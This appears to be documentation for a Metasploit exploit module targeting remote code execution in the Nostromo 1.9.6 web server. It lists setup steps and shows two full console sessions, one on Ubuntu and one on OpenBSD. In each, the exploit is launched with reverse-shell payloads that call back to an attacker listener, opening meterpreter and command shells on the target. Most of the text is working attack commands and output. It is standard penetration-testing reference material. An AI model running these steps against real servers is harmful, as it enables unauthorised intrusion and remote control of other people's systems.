## Vulnerable Application

Verified against:

* Nostromo 1.9.6 on Linux

Nostromo sources can be downloaded from http://www.nazgul.ch/dev_nostromo.html

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/multi/http/nostromo_code_exec`
4. Do: `set rport `
5. Do: `set rhost `
6. Do: `check`
7. Do: `set payload linux/x86/meterpreter/reverse_tcp`
8. Do: `set lhost `
9. Do: `exploit`
10. You should get a shell.

## Scenarios

Example utilizing nostromo 1.9.6 on Ubuntu Linux.

```
msf > use exploit/multi/http/nostromo_code_exec
msf exploit(multi/http/nostromo_code_exec) > set RHOSTS 192.168.1.9
RHOSTS => 192.168.1.9
msf exploit(multi/http/nostromo_code_exec) > set RPORT 8000
RPORT => 8000
msf exploit(multi/http/nostromo_code_exec) > check
[*] 192.168.1.9:8000 - The target appears to be vulnerable.
msf exploit(multi/http/nostromo_code_exec) > set target 1
target => 1
msf exploit(multi/http/nostromo_code_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(multi/http/nostromo_code_exec) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf exploit(multi/http/nostromo_code_exec) > set LPORT 4444
LPORT => 4444
msf exploit(multi/http/nostromo_code_exec) > run

[*] Started reverse TCP handler on 192.168.1.10:4444
[*] Configuring Automatic (Linux Dropper) target
[*] Sending linux/x86/meterpreter/reverse_tcp command stager
[*] Sending stage (985320 bytes) to 192.168.1.9
[*] Meterpreter session 2 opened (192.168.1.10:4444 -> 192.168.1.9:52544) at 2019-10-29 16:08:18 +0100
[*] Command Stager progress - 100.00% done (763/763 bytes)

meterpreter > sysinfo
Computer     : nostromo.local
OS           : Ubuntu 18.04 (Linux 4.15.0-62-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.9 - Meterpreter session 2 closed.  Reason: User exit
```

nostromo 1.9.6 on OpenBSD.

```
msf > use exploit/multi/http/nostromo_code_exec
msf exploit(multi/http/nostromo_code_exec) > set RHOSTS 192.168.1.9
RHOSTS => 192.168.1.9
msf exploit(multi/http/nostromo_code_exec) > set RPORT 8001
RPORT => 8001
msf exploit(multi/http/nostromo_code_exec) > check
[*] 192.168.1.9:8001 - The target appears to be vulnerable.
msf exploit(multi/http/nostromo_code_exec) > set target 0
target => 0
msf exploit(multi/http/nostromo_code_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf exploit(multi/http/nostromo_code_exec) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf exploit(multi/http/nostromo_code_exec) > set LPORT 4444
LPORT => 4444
msf exploit(multi/http/nostromo_code_exec) > run

[*] Started reverse TCP handler on 192.168.1.10:4444
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (192.168.1.10:4444 -> 192.168.1.9:52312) at 2019-10-29 15:48:28 +0100

id
uid=536(_nostromo) gid=536(_nostromo) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
uname -avr
OpenBSD nostromo.local 6.4 GENERIC#349 amd64
^C
Abort session 1? [y/N]  y

[*] 192.168.1.9 - Command shell session 1 closed.  Reason: User exit
```